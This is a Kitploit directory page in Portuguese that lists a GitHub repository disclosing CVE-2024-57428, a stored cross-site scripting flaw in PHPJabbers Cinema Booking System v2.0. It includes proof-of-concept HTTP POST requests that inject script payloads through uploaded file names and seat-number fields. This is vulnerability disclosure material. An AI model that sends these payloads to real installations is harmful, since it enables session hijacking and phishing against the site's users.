Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-57428 — CVE-2024-57428: PHPJabbers Cinema Booking System v2.0 sofre de XSS armazenado, permitindo injeção persistente de JavaScript para ataques de phishing e malware. | Kitploit
Ferramentas/GitHubGitHub/ahrixia/cve-2024-57428
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPhishingTestes de Penetração
GitHubahrixia/cve-2024-57428

CVE-2024-57428

CVE-2024-57428: PHPJabbers Cinema Booking System v2.0 sofre de XSS armazenado, permitindo injeção persistente de JavaScript para ataques de phishing e malware.

Ver Repositório
45há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-57428

Existe uma vulnerabilidade de Cross-Site Scripting (XSS) armazenado no PHPJabbers Cinema Booking System v2.0 devido à entrada não sanitizada nos campos de upload de arquivo (event_img, seat_maps) e nas configurações de número de assento (number[new_X] no pjActionCreate). Atacantes podem injetar JavaScript persistente, levando a phishing, injeção de malware e sequestro de sessão.

Parâmetro Vulnerável: event_img e seat_maps's file name

Impacto:

XSS armazenado é mais severo que XSS reflexivo, pois afeta todos os usuários que acessam o conteúdo injetado. Pode ser utilizado para ataques de phishing persistentes, roubo de sessão ou injeção de malware em uma grande base de usuários.

Exploit - Prova de Conceito (POC)

Cross-Site Scripting (XSS) Armazenado

XSS Armazenado via Upload de Arquivo

Payload: \">

root@kitploit:~
POST /CinemaBookingDev/index.php?controller=pjAdminEvents&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 38611
[SNIP]


------WebKitFormBoundaryKOsvqJhAGpZAt33t
Content-Disposition: form-data; name="event_img"; filename="luffy.jpg\">"
Content-Type: image/jpeg

NÚMERO DE ASSENTO DO SALÃO DE CINEMA

Payload: "><script>alert(x)</script>

root@kitploit:~
POST /CinemaBookingDev/index.php?controller=pjAdminVenues&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 1812
[SNIP]


------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="seats_count"

11
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_1]"

1"><script>alert(1)</script>1
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_2]"

2"><script>alert(2)</script>2
Baixar ferramenta